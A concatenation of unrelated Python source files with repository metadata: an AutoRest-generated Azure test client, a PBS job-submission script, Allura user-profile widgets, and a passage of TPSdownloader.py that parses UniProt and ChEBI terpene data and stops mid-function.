7dd6bcb7d123f2574742e3a89e2b8c6771d98339 | 3,120 | py | Python | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/CustomBaseUri/fixtures/acceptancetestscustombaseuri/auto_rest_parameterized_host_test_client.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 1 | 2017-08-27T07:40:09.000Z | 2017-08-27T07:40:09.000Z | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/CustomBaseUri/fixtures/acceptancetestscustombaseuri/auto_rest_parameterized_host_test_client.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | null | null | null | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/CustomBaseUri/fixtures/acceptancetestscustombaseuri/auto_rest_parameterized_host_test_client.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 1 | 2019-07-20T12:20:03.000Z | 2019-07-20T12:20:03.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.paths_operations import PathsOperations
from . import models
class AutoRestParameterizedHostTestClientConfiguration(AzureConfiguration):
    """Configuration for AutoRestParameterizedHostTestClient
    Note that all parameters used to create this instance are saved as instance
    attributes.
    :param credentials: Credentials needed for the client to connect to Azure.
    :type credentials: :mod:`A msrestazure Credentials
     object<msrestazure.azure_active_directory>`
    :param host: A string value that is used as a global part of the
     parameterized host
    :type host: str
    """
    def __init__(
            self, credentials, host):
        # Validate required parameters; None checks precede the type check so
        # a missing host raises ValueError rather than TypeError.
        if credentials is None:
            raise ValueError("Parameter 'credentials' must not be None.")
        if host is None:
            raise ValueError("Parameter 'host' must not be None.")
        if not isinstance(host, str):
            raise TypeError("Parameter 'host' must be str.")
        # Parameterized host template; {accountName} and {host} are filled in
        # per-request by the operations layer.
        base_url = 'http://{accountName}{host}'
        super(AutoRestParameterizedHostTestClientConfiguration, self).__init__(base_url)
        # Identify this SDK in the User-Agent header.
        self.add_user_agent('autorestparameterizedhosttestclient/{}'.format(VERSION))
        self.add_user_agent('Azure-SDK-For-Python')
        self.credentials = credentials
        self.host = host
class AutoRestParameterizedHostTestClient(object):
    """Test Infrastructure for AutoRest.

    :ivar config: Configuration for client.
    :vartype config: AutoRestParameterizedHostTestClientConfiguration
    :ivar paths: Paths operations
    :vartype paths: .operations.PathsOperations
    :param credentials: Credentials needed for the client to connect to Azure.
    :type credentials: :mod:`A msrestazure Credentials
     object<msrestazure.azure_active_directory>`
    :param host: A string value that is used as a global part of the
     parameterized host
    :type host: str
    """
    def __init__(self, credentials, host):
        # Build the shared configuration and the low-level REST pipeline.
        self.config = AutoRestParameterizedHostTestClientConfiguration(credentials, host)
        self._client = ServiceClient(self.config.credentials, self.config)
        # Register every model class from the models module for
        # (de)serialization by name.
        model_classes = {
            name: cls for name, cls in models.__dict__.items() if isinstance(cls, type)
        }
        self.api_version = '1.0.0'
        self._serialize = Serializer(model_classes)
        self._deserialize = Deserializer(model_classes)
        # Operation group exposed to callers.
        self.paths = PathsOperations(
            self._client, self.config, self._serialize, self._deserialize)
| 37.590361 | 89 | 0.689423 |
36c95b740494d3cd27df386e12dbbdb0f563d570 | 631 | py | Python | submit_jobs.py | christiangil/Optimization-Tutorial | 22091fd5784978b6ac27406ecfa78c8c717400f0 | [
"MIT"
] | 2 | 2020-03-16T16:39:07.000Z | 2020-03-16T20:34:08.000Z | submit_jobs.py | christiangil/Optimization-Tutorial | 22091fd5784978b6ac27406ecfa78c8c717400f0 | [
"MIT"
] | null | null | null | submit_jobs.py | christiangil/Optimization-Tutorial | 22091fd5784978b6ac27406ecfa78c8c717400f0 | [
"MIT"
] | null | null | null | #This script submits jobs to ICS-ACI
import os
import os.path
import glob
import numpy as np
def submit_job(path, job_name):
    """Stage a job script into the CWD, submit it with qsub, then move it back."""
    stage_in = 'mv %s %s'%(path, job_name)
    submit = 'qsub %s'%job_name
    stage_out = 'mv %s %s'%(job_name,path)
    os.system(stage_in)
    os.system(submit)
    os.system(stage_out)
###############################
Njobs_counter = 0
# Directory containing this script; used to restore the CWD after globbing.
script_dir = os.path.dirname(os.path.realpath(__file__))
jobs_dir = "jobs/"
# Collect all PBS job scripts from the jobs/ subdirectory, then return.
os.chdir(jobs_dir)
job_names = glob.glob("*.pbs")
os.chdir(script_dir)
# Submit each job script and count submissions.
for job_name in job_names:
    print(job_name)
    path = jobs_dir + job_name
    submit_job(path, job_name)
    Njobs_counter += 1
print('found and submitted %d jobs'%(Njobs_counter))
ee0d65254f690b3291152fecbfee5df7339b6aed | 5,640 | py | Python | Allura/allura/lib/widgets/user_profile.py | apache/allura | 6184203235ac6f83c943fae7fd3fef54678f9ed7 | [
"Apache-2.0"
] | 113 | 2015-03-25T10:33:37.000Z | 2022-02-16T20:55:06.000Z | Allura/allura/lib/widgets/user_profile.py | apache/allura | 6184203235ac6f83c943fae7fd3fef54678f9ed7 | [
"Apache-2.0"
] | 4 | 2017-08-04T16:19:07.000Z | 2020-06-08T19:01:33.000Z | Allura/allura/lib/widgets/user_profile.py | apache/allura | 6184203235ac6f83c943fae7fd3fef54678f9ed7 | [
"Apache-2.0"
] | 36 | 2015-08-14T16:27:39.000Z | 2022-02-16T20:54:35.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from __future__ import absolute_import
import logging
import re
import ew as ew_core
import ew.jinja2_ew as ew
from jinja2 import Markup
from paste.deploy.converters import asbool
import tg
from tg import app_globals as g
from tg import request
from tg import tmpl_context as c
from allura.lib import helpers as h
from allura.lib import validators as v
from allura.lib.plugin import AuthenticationProvider
from .forms import ForgeForm
log = logging.getLogger(__name__)
class SendMessageForm(ForgeForm):
    """Form for composing a private message to another user."""
    template = 'jinja:allura.ext.user_profile:templates/send_message_form.html'
    submit_text = 'Send Message'
    class fields(ew_core.NameList):
        # Required subject line; the validator rejects empty input.
        subject = ew.TextField(
            validator=v.UnicodeString(
                not_empty=True,
                messages={'empty': "You must provide a Subject"}),
            attrs=dict(
                placeholder='Enter your subject here',
                title='Enter your subject here',
                style='width: 425px'),
            label='Subject')
        # Required message body.
        message = ew.TextArea(
            validator=v.UnicodeString(
                not_empty=True,
                messages={'empty': "You must provide a Message"}),
            attrs=dict(
                placeholder='Enter your message here',
                title='Enter your message here',
                style='width: 425px; height:200px'),
            label='Message')
        # Optional checkboxes controlling copies and reply-to behavior.
        cc = ew.Checkbox(label='Send me a copy')
        reply_to_real_address = ew.Checkbox(label='Include my email address in the reply field for this message')
class SectionsUtil(object):
    """Helpers for assembling profile/dashboard section lists."""

    @staticmethod
    def load_sections(app):
        """Load section classes registered for *app* via entry points.

        Sections named in the '<app>_sections.order' config value come first,
        in that order; any remaining sections follow in discovery order.
        """
        available = {}
        for ep in h.iter_entry_points('allura.%s.sections' % app):
            available[ep.name] = ep.load()
        order_spec = tg.config.get('%s_sections.order' % app, '')
        ordered = [
            available.pop(name)
            for name in re.split(r'\s*,\s*', order_spec)
            if name in available
        ]
        return ordered + list(available.values())
class SectionBase(object):
    """Common base class for sections shown in the Profile tool and Dashboard."""

    # Jinja template path; subclasses must override.
    template = ''

    def __init__(self, user):
        """Bind the section to *user*; stored as an attribute of the same name."""
        self.user = user
        self.context = None

    def check_display(self):
        """Return True when the section should be rendered at all."""
        return True

    def prepare_context(self, context):
        """Hook for subclasses to add values to the template context."""
        return context

    def setup_context(self):
        """Build the base template context and run it through prepare_context()."""
        base_context = {
            'h': h,
            'c': c,
            'g': g,
            'user': self.user,
            'config': tg.config,
            'auth': AuthenticationProvider.get(request),
        }
        self.context = self.prepare_context(base_context)

    def display(self, *a, **kw):
        """Render the section template as markup.

        Returns '' when check_display() is False. Rendering errors are logged
        and yield '' as well, unless the app runs in debug mode, in which case
        the exception is re-raised.
        """
        if not self.check_display():
            return ''
        try:
            template = g.jinja2_env.get_template(self.template)
            if not self.context:
                self.setup_context()
            return Markup(template.render(self.context))
        except Exception as e:
            log.exception('Error rendering section %s: %s', type(self).__name__, e)
            if asbool(tg.config.get('debug')):
                raise
            return ''
class ProjectsSectionBase(SectionBase):
    """Section listing the user's visible, non-special projects."""

    def get_projects(self):
        """Return the user's projects that the current viewer may see.

        Excludes the current project, projects the viewer cannot read (unless
        viewing their own profile), neighborhood projects, and user projects.
        """
        visible = []
        for project in self.user.my_projects():
            if project == c.project:
                continue
            if self.user != c.user and not h.has_access(project, 'read'):
                continue
            if project.is_nbhd_project or project.is_user_project:
                continue
            visible.append(project)
        return visible

    def prepare_context(self, context):
        """Expose the project list to the template."""
        context['projects'] = self.get_projects()
        return context

    def __json__(self):
        """Serialize the project list for JSON responses."""
        project_dicts = [
            dict(
                name=project['name'],
                url=project.url(),
                summary=project['summary'],
                last_updated=project['last_updated'])
            for project in self.get_projects()
        ]
        return dict(projects=project_dicts)
| 33.176471 | 113 | 0.608333 |
f651d89b03c83d884b638967d7e8017bfa8be1d0 | 108,828 | py | Python | TPSdownloader.py | mmokrejs/TPSdownloader | 08498feb8125ebd7ffeed159403a1f3eb5866cee | [
"MIT"
] | null | null | null | TPSdownloader.py | mmokrejs/TPSdownloader | 08498feb8125ebd7ffeed159403a1f3eb5866cee | [
"MIT"
] | null | null | null | TPSdownloader.py | mmokrejs/TPSdownloader | 08498feb8125ebd7ffeed159403a1f3eb5866cee | [
"MIT"
] | null | null | null | #! /usr/bin/python3
import sys
import os
import datetime
import numpy as np
import pandas as pd
from shlex import split as shlex_split
from subprocess import Popen, PIPE, call #, STDOUT
from optparse import OptionParser
import xml.etree.ElementTree as ET
import time
import re
# from re import compile, findall, finditer, sub, IGNORECASE
import copy
from itertools import chain
import gzip
from natsort import natsorted
try:
from rdkit import Chem
# not available (yet) in Gentoo
# https://rdkit.readthedocs.io/en/latest/Install.html
except ImportError:
Chem = None
# release stamp, reported by the --version switch
version = "20210717"
# command-line interface; the parsed result is consumed module-wide through
# the global `myoptions` (notably myoptions.debug / myoptions.verbose)
myparser = OptionParser(version="%s version %s" % ('%prog', version))
myparser.add_option("--uniprot-ids-from-file", action="store", type="string", dest="uniprot_ids_from_file", default='',
                    help="Obtain a list of Uniprot IDs from column 'Uniprot ID' in 'Sheet1'.")
myparser.add_option("--uniprot-id-file", action="store", type="string", dest="uniprot_idfile", default='-',
                    help="Obtain list of Uniprot IDs from a single-column text file or STDIN, is mutually exclusive with --chebi-id-file.")
myparser.add_option("--chebi-id-file", action="store", type="string", dest="chebi_idfile", default='-',
                    help="Obtain a list of ChEBI IDs from a single-column text file or STDIN, is mutually exclusive with --uniprot-id-file.")
myparser.add_option("--uniprot-id", action="store", type="string", dest="uniprot_id", default=None,
                    help="List of Uniprot IDs, is mutually exclusive with --chebi-id.")
myparser.add_option("--chebi-id", action="store", type="string", dest="chebi_id", default=None,
                    help="List of ChEBI IDs, is mutually exclusive with --uniprot-id.")
myparser.add_option("--run-mode", action="store", type="string", dest="run_mode", default='terpene_synthases',
                    help="Run type mode: [terpene_synthases, CYPs] (default: terpene_synthases).")
myparser.add_option("--xls-storage", action="store", type="string", dest="xls_storage", default="TPSdownloader.xls",
                    help="Use this file to parse input data and also as an output file with new results appended to it. Use None to disable the default. Default is TPSdownloader.xls.")
myparser.add_option("--already-curated-id-from-file", action="store", type="string", dest="already_curated_idfile", default=None,
                    help="Obtain list of already curated Uniprot IDs from a single-column text file or STDIN, default None. These IDs will not appear in the list of newly annotated proteins still to be added to our manually curated table.")
myparser.add_option("--outfmt", action="store", type="string", dest="outfmt", default="xls",
                    help="Format of output file. It is used to preserve data between restarts too. CSV or XLSX (default)")
myparser.add_option("--verbose", action="store", type="int", dest="verbose", default=0,
                    help="Set verbosity to some value default is zero")
myparser.add_option("--debug", action="store", type="int", dest="debug", default=0,
                    help="Set debug to some value")
# NOTE: parsing happens at import time; myoptions/myargs are module globals
(myoptions, myargs) = myparser.parse_args()
# extra spreadsheet column headers emitted for every product / substrate of a reaction
extra_product_colnames = ['Name of product', 'Product compound description', 'Chemical formula of product', 'SMILES of product (including stereochemistry)']
extra_substrate_colnames = ['Substrate (including stereochemistry)', 'Substrate compound description', 'Chemical formula of substrate', 'SMILES of substrate (including stereochemistry)']
# extra_intermediate_colnames = ['Name of intermediate', 'Intermediate compound description', 'Chemical formula of intermediate', 'SMILES of intermediate (including stereochemistry)']
substrates = set(['CHEBI:17211', 'CHEBI:14299', 'CHEBI:5332', 'CHEBI:42877', 'CHEBI:24223', 'CHEBI:58635', 'CHEBI:30939', 'CHEBI:10760', 'CHEBI:29558', 'CHEBI:57907', 'CHEBI:58756', 'CHEBI:58057', 'CHEBI:162247', 'CHEBI:60374', 'CHEBI:138307', 'CHEBI:61984', 'CHEBI:64801', 'CHEBI:15441', 'CHEBI:18728', 'CHEBI:11026', 'CHEBI:11072', 'CHEBI:372', 'CHEBI:58206', 'CHEBI:138223', 'CHEBI:138807', 'CHEBI:58553', 'CHEBI:57533', 'CHEBI:7525', 'CHEBI:138305', 'CHEBI:15440', 'CHEBI:10843', 'CHEBI:9245', 'CHEBI:10795', 'CHEBI:15104', 'CHEBI:26746', 'CHEBI:175763', 'CHEBI:17407', 'CHEBI:12874', 'CHEBI:11491', 'CHEBI:42496', 'CHEBI:10700', 'CHEBI:11488', 'CHEBI:12854', 'CHEBI:19789', 'CHEBI:138890', 'CHEBI:138232'])
# CHEBI:17211 CHEBI:14299, CHEBI:5332, CHEBI:42877, CHEBI:24223 GPP
# CHEBI:58635 nebo CHEBI:30939 CHEBI:10760, CHEBI:29558 (+)-copalyl diphosphate, actually an intermediate of H8ZM70
# CHEBI:57907 (2E,6E,10E,14E)-GFPP
# CHEBI:58756 (2E,6E,10E)-GGPP
# CHEBI:58057 (2E)-GPP aka geranyl diphosphate(3โ)
# CHEBI:162247 (2Z,6E)-FPP
# CHEBI:60374 (2Z,6Z)-FPP
# CHEBI:138307 (3S,22S)-2,3:22,23-diepoxy-2,3,22,23-tetrahydrosqualene
# CHEBI:61984 (E)-2-MeGPP alias (E)-2-methylgeranyl diphosphate
# CHEBI:64801 (R)-tetraprenyl-ฮฒ-curcumene
# CHEBI:15441 CHEBI:18728, CHEBI:11026, CHEBI:11072, CHEBI:372 (S)-2,3-epoxysqualene
# CHEBI:58206 all-trans-heptaprenyl PP
# CHEBI:138223 ent-copal-8-ol diphosphate(3โ)
# CHEBI:138807 ent-copal-8-ol diphosphate
# CHEBI:58553 ent-copalyl diphosphate
# CHEBI:57533 GGPP aka geranylgeranyl diphosphate(3โ)
# CHEBI:7525 NPP
# CHEBI:138305 pre-ฮฑ-onocerin
# CHEBI:15440 CHEBI:10843, CHEBI:9245, CHEBI:10795, CHEBI:15104, CHEBI:26746 squalene
# CHEBI:175763 (2E,6E)-FPP(3-) aka 2-trans,6-trans-farnesyl diphosphate(3โ)
# CHEBI:17407 (E,E)-FPP FPP CHEBI:12874, CHEBI:11491, CHEBI:42496, CHEBI:10700, CHEBI:11488, CHEBI:12854, CHEBI:19789 (2-trans,6-trans-farnesyl diphosphate) alias (E,E)-FPP alias (2E,6E)-FPP
# peregrinol diphosphate CHEBI:138890
# peregrinol PP alias? peregrinol diphosphate(3โ) CHEBI:138232
#
# Nevyreseno:
# (Z,Z)-FPP
# NNPP
# the cofactors are annotated outside of each chemical reaction in Uniprot, see https://www.uniprot.org/uniprot/A0A1D6LTV0.xml
# <comment type="cofactor">
# <cofactor evidence="2">
# <name>Mg(2+)</name>
# <dbReference type="ChEBI" id="CHEBI:18420"/>
# </cofactor>
# <cofactor evidence="2">
# <name>Mn(2+)</name>
# <dbReference type="ChEBI" id="CHEBI:29035"/>
# </cofactor>
# <text evidence="4">Binds 3 Mg(2+) or Mn(2+) ions per subunit.</text>
# </comment>
# ChEBI IDs of possible cofactors annotated outside the individual reactions (see the comments below)
possible_cofactors = {'CHEBI:18420', 'CHEBI:15377', 'CHEBI:29035', 'CHEBI:48828'}
# CHEBI:18420 Mg2+
# CHEBI:29035 Mn2+
# CHEBI:48828 Co2+
# CHEBI:15377 H2O
# CHEBI:30413 heme
# CHEBI:60344 heme b
# CHEBI:29103 K+
# CHEBI:29034 Fe(3+)
# CHEBI:49786 Ni(2+)
# CHEBI:29108 Ca(2+)
# CHEBI:58210 FMN
# CHEBI:57783 NADPH
# CHEBI:24875 Fe cation
# CHEBI:60240 a divalent metal cation
# CHEBI:49883 [4Fe-4S] cluster
# disabling intermediates altogether, they should be treated as products
# intermediates = ['CHEBI:63190', 'CHEBI:58622', 'CHEBI:49263', 'CHEBI:58553', 'CHEBI:64283', 'CHEBI:58635', 'CHEBI:30939', 'CHEBI:10760', 'CHEBI:29558']
# CHEBI:63190 (+)-ฮฒ-caryophyllene
# CHEBI:58622 9ฮฑ-copalyl diphosphate
# CHEBI:49263 (S)-ฮฒ-bisabolene
# CHEBI:58553 ent-copalyl diphosphate
# CHEBI:64283 copal-8-ol diphosphate(3โ) aka 8-hydroxycopalyl diphosphate
# CHEBI:58635 CHEBI:30939 CHEBI:10760, CHEBI:29558 (+)-copalyl diphosphate, see e.g. H8ZM70
# CHEBI:138305 (21S)-21,22-epoxypolypoda-8(26)-13,17-trien-3ฮฒ-ol aka pre-alpha-onocerin
# blacklist of IDs of reaction substrates or non-cyclic terpenes, etc., but *also* including ฮฒ-farnesene CHEBI:10418
# these IDs are not downloaded into the cache, unless they already were downloaded before addition to this list
# IDs appearing in this list also do not get output into the output list of terpenes
non_terpene_and_acyclic_terpene_chebi_ids = set(['CHEBI:35194', 'CHEBI:33019', 'CHEBI:128769', 'CHEBI:10418', 'CHEBI:10280', 'CHEBI:58756', 'CHEBI:15441', 'CHEBI:57665', 'CHEBI:15440', 'CHEBI:57907', 'CHEBI:61984', 'CHEBI:58206', 'CHEBI:15347', 'CHEBI:162247', 'CHEBI:17221', 'CHEBI:60374', 'CHEBI:98', 'CHEBI:46702', 'CHEBI:16240', 'CHEBI:35757', 'CHEBI:3407', 'CHEBI:13657', 'CHEBI:25382', 'CHEBI:43474', 'CHEBI:43470', 'CHEBI:29139', 'CHEBI:28938', 'CHEBI:83628', 'CHEBI:24646', 'CHEBI:134188', 'CHEBI:22534', 'CHEBI:49783', 'CHEBI:7435', 'CHEBI:139521', 'CHEBI:15379', 'CHEBI:44742', 'CHEBI:7860', 'CHEBI:10745', 'CHEBI:13416', 'CHEBI:23833', 'CHEBI:25366', 'CHEBI:29097', 'CHEBI:30491', 'CHEBI:139520', 'CHEBI:132124', 'CHEBI:57540', 'CHEBI:58340', 'CHEBI:128753', 'CHEBI:33384', 'CHEBI:17268', 'CHEBI:57288', 'CHEBI:33738', 'CHEBI:33737', 'CHEBI:58720', 'CHEBI:57783', 'CHEBI:57287', 'CHEBI:15378', 'CHEBI:57623', 'CHEBI:57945', 'CHEBI:58349', 'CHEBI:29452', 'CHEBI:17447', 'CHEBI:48058', 'CHEBI:35194']) - substrates - possible_cofactors
# CHEBI:35194 - isoprene
# CHEBI:33019 - diphosphate(3โ)
# CHEBI:57623 - prenyl diphosphate(3-)
# CHEBI:128769 - isopentenyl diphosphate(3โ)
# CHEBI:10280 - (E,E)-ฮฑ-farnesene
# CHEBI:16240 - hydrogen peroxide
# CHEBI:35757 - monocarboxylic acid anion
# CHEBI:3407 - monocarboxylic acid anion
# CHEBI:13657 - monocarboxylic acid anion
# CHEBI:25382 - monocarboxylic acid anion
# CHEBI:43474 - hydrogenphosphate
# CHEBI:43470 - hydrogenphosphate
# CHEBI:29139 - hydrogenphosphate
# CHEBI:28938 - ammonium
# CHEBI:83628 - N-acylammonia
# CHEBI:24646 - hydroquinones
# CHEBI:134188 - hydroquinones
# CHEBI:22534 - ammonium
# CHEBI:49783 - ammonium
# CHEBI:7435 - ammonium
# CHEBI:139521 - phenolic radical donor
# CHEBI:15379 - dioxygen
# CHEBI:44742 - dioxygen
# CHEBI:7860 - dioxygen
# CHEBI:10745 - dioxygen
# CHEBI:13416 - dioxygen
# CHEBI:23833 - dioxygen
# CHEBI:25366 - dioxygen
# CHEBI:29097 - dioxygen
# CHEBI:30491 - dioxygen
# CHEBI:139520 - phenolic donor
# CHEBI:132124 - 1,4-benzoquinones
# CHEBI:57540 - NAD(1-)
# CHEBI:58340 - O-acetyl-L-serine zwitterion
# CHEBI:128753 - (2E)-4-hydroxy-3-methylbut-2-enyl diphosphate(3-)
# CHEBI:33384 - L-serine zwitterion
# CHEBI:17268 - myo-inositol
# CHEBI:57288 - acetyl-CoA(4-)
# CHEBI:57287 - coenzyme A(4-)
# CHEBI:33738 - di-mu-sulfido-diiron(1+)
# CHEBI:33737 - di-mu-sulfido-diiron(2+)
# CHEBI:58720 - D-glucopyranuronate
# CHEBI:57783 - NADPH(4-)
# CHEBI:15378 - hydron
# CHEBI:57945 - NADH(2-)
# CHEBI:58349 - NADP(3-)
# CHEBI:48058 - buten-2-one
# CHEBI:17221 - ฮฒ-myrcene (acyclic monoterpene), see e.g. Q5SBP1
# CHEBI:98 - (S)-linalool
# CHEBI:29452 - nerol
# CHEBI:17447 - geraniol
# CHEBI:35194 - isoprene
def parse_list_or_set_line(line):
    """Parse a single ``key: value`` storage-file line and return the value part.

    The value is decoded by :func:`parse_list_or_set`; ``None`` items and the
    literal string ``'None'`` are filtered out.  The first character after the
    colon (the separating space) and the last character of the line
    (presumably the trailing newline -- TODO confirm lines keep it) are
    stripped before decoding.
    """
    # BUGFIX: split on the *first* colon only -- the value itself may contain
    # colons (e.g. ChEBI identifiers such as 'CHEBI:17211'), which the
    # original unlimited split truncated.
    _strlist = line.split(':', 1)[1][1:-1]
    return filter(lambda x: x != 'None' and x is not None, parse_list_or_set(_strlist))
def parse_list_or_set(_strlist):
    """Decode the textual repr of a list/set read back from the storage file.

    Recognised inputs: ``'None'``, ``'set()'``, ``'[]'`` (all yield ``[]``),
    repr of a list of quoted strings or of bare items, ``'[None]'`` and
    ``"set([...])"``.  Anything unrecognised is returned unchanged as a
    string.  When the result is a list, items that look like integers are
    converted to ``int``; branches producing ``map`` objects skip that
    conversion (preserved from the original behaviour).
    """
    if _strlist == 'None':
        _out = []
    elif _strlist == 'set()':
        _out = []
    elif _strlist == '[]':
        _out = []
    elif _strlist and _strlist[0] == '[':
        if "," in _strlist:
            _out = _strlist[1:-1].split(', ')
            if _out[0][0] == "'":
                # items were quoted, e.g. "['a', 'b']" -- strip the quotes
                _out = map(lambda y: y[1:-1], _out)
        elif _strlist[:2] == "['" or _strlist[:2] == '["':
            _out = [_strlist[2:-2]]
        elif _strlist == '[None]':
            _out = [None]
        else:
            _out = [_strlist[2:-2]]
    elif _strlist and _strlist.startswith('set('):  # set(['aa', 'a', 'c', 'd', 'bb'])
        # BUGFIX: the original tested `_strlist[0] == 'set('`, comparing a
        # single character to a four-character string -- never true, so
        # set() reprs fell through to the final else unparsed.
        _out = map(lambda x: x[1:-1], _strlist[5:-2].split(', '))
    else:
        _out = _strlist
    # convert to integers if possible
    if isinstance(_out, list):
        _new = []
        for _item in _out:
            try:
                _new.append(int(_item))
            except (TypeError, ValueError):  # narrowed from a bare except
                _new.append(_item)
        return _new
    else:
        return _out
def parse_known_terpenes(filename="terpene_names.uniq.txt"):
    """Read known terpene names, one per line, from *filename*.

    Multi-line strings are wrapped by double-quotes.  Such entries appear in
    the XLSX files mostly by mistake, but the line-based approach yields
    entries starting with a double-quote sign, so a leading quote is dropped.
    Lines starting with '#' are skipped.  This is unused code at the moment.
    """
    print("Info: Opening %s with known terpenes" % filename)
    _terpenes = []
    with open(filename) as _fh:
        for _raw in _fh:
            if _raw.startswith('#'):
                continue  # comment line
            if _raw.startswith('"'):
                # drop the leading quote together with the trailing newline
                _terpenes.append(_raw[1:-1].strip())
            else:
                _terpenes.append(_raw[:-1].strip())
    if myoptions.debug: print("Debug: _known_terpenes=%s" % str(_terpenes))
    return _terpenes
def parse_chebi_xml(filename):
    """Parse a cached ChEBI entity XML file into its basic attributes.

    Keeps data in lists so we can capture multiple values eventually, do not
    know what to expect at the moment.  ChEBI keeps substance names in two
    places, <NAME> and <SYNONYM> tags; the official IUPAC name comes first,
    synonyms are appended and duplicates are skipped (the SYNONYM listing
    re-includes the official name).

    Returns the tuple ``(chebi_id, names, definition, formula, smiles)``.
    When the file cannot be parsed it is renamed to ``<filename>.bad`` so it
    can be re-fetched later, and the tuple contains the initial empty values.
    """
    _chebi_id = None
    _definition = []
    _names = []  # keep a list (not a set) to preserve ordering: the first name is the official IUPAC name, then synonyms are appended
    _formula = None
    _smiles = None
    try:
        # some cached files are truncated/broken, see
        # https://github.com/ebi-chebi/ChEBI/issues/4182
        etree = ET.parse(filename)
    except (ET.ParseError, OSError):
        # BUGFIX: narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit
        try:
            os.rename(filename, filename + ".bad")
        except FileNotFoundError as e:
            # BUGFIX: the original formatted str(e.with_traceback) -- a bound
            # method object -- instead of the exception message itself
            sys.stderr.write("Error: Failed to rename a file %s: %s\n" % (str(filename), str(e)))
        return (_chebi_id, _names, _definition, _formula, _smiles)
    root = etree.getroot()
    for elem in root:
        if myoptions.debug: print("Level 0: ", elem.tag, ' ', elem.attrib, ' ', elem.text)
        for child in elem:
            if myoptions.debug > 1: print("Items: ", str(child.items()))
            if myoptions.debug: print("Level 1: tag:", child.tag, 'attrib:', child.attrib, 'text:', child.text)
            if child.tag == 'ID':
                if myoptions.debug: print("L1: child.attrib: ", child.attrib, "child.tag: ", child.tag)
                if not _chebi_id:
                    _chebi_id = child.text
                else:
                    raise ValueError("Does ChEBI have multiple IDs for %s ?" % str(child.text))
            if child.tag == 'NAME':
                # NAME may repeat and may duplicate a SYNONYM, e.g.
                # ['casbene', 'casbene', 'Casbene'] -- keep first occurrences only
                if child.text not in _names:
                    _names.append(child.text)
            if child.tag == 'DEFINITION':
                if not _definition:
                    _definition = [child.text]
                else:
                    _definition += [child.text]
            if child.tag == 'FORMULA':
                if not _formula:
                    _formula = [child.text]  # TODO: wrapped in a list only to keep in sync with the other values, which is inefficient; downstream code in recursive_translator() splits such strings into single letters mistakenly
            if child.tag == 'SYNONYM':
                # the SYNONYMS listing re-includes the official IUPAC name, e.g.
                # https://www.ebi.ac.uk/chebi/searchId.do?chebiId=CHEBI:15415
                if child.text not in _names:
                    _names.append(child.text)
            if child.tag == 'SMILES':
                if not _smiles:
                    _smiles = [child.text]  # TODO: wrapped in a list only to keep in sync with the other values, see FORMULA above
            # INCHI is intentionally not collected at the moment
    if myoptions.debug: print("Info: IDs: %s, names: %s, definition: %s, formula: %s, smiles: %s" % (str(_chebi_id), str(_names), str(_definition), str(_formula), str(_smiles)))
    return (_chebi_id, _names, _definition, _formula, _smiles)
def check_parsed_list_lengths(_primary_accession, _chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids, _cofactors):
    """Verify the six per-reaction lists parsed for one Uniprot entry are equally long.

    The Uniprot annotation is inconsistent.  Some entries have annotated
    reactions, have ChEBI IDs assigned to each reactant, have RHEA IDs and
    one EC number per reaction.  But some entries, despite having most of the
    data, lack the EC number (most commonly), or some ChEBI or RHEA IDs.
    Also, the reaction is ideally recorded like
    '(2E,6E)-farnesyl diphosphate = (1E,4E)-germacrene B + diphosphate'
    but sometimes it is just free text describing what is deemed to be going on.

    Writes one diagnostic per too-short list to stderr and raises
    RuntimeError when the lengths differ; returns None when they all agree.
    """
    _lists = [_chebi_ids, _rhea_ids, _ec_numbers, _reactions, _cofactor_ids, _cofactors]
    _listnames = ['_chebi_ids', '_rhea_ids', '_ec_numbers', '_reactions', '_cofactor_ids', '_cofactors']
    _lengths = [len(x) for x in _lists]
    _min = min(_lengths)
    _max = max(_lengths)
    if _min != _max:
        for _list, _listname in zip(_lists, _listnames):
            if len(_list) < _max:
                sys.stderr.write("Error: %s: Names are %s, their lengths are %s\n" % (str(_primary_accession), str(_listnames), str([len(x) for x in [_chebi_ids, _rhea_ids, _ec_numbers, _reactions]])))
                if _listname == '_chebi_ids':
                    sys.stderr.write("Error: %s: Missing some ChEBI ID in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
                elif _listname == '_rhea_ids':
                    sys.stderr.write("Error: %s: Missing some RHEA ID in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
                elif _listname == '_ec_numbers':
                    sys.stderr.write("Error: %s: Missing some EC number in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
                elif _listname == '_reactions':
                    sys.stderr.write("Error: %s: Missing some reaction description in %s=%s is shorter than others: %s.\n" % (str(_primary_accession), _listname, str(_list), str([_chebi_ids, _rhea_ids, _ec_numbers, _reactions])))
        # BUGFIX: the original ended with a bare `raise` outside any except
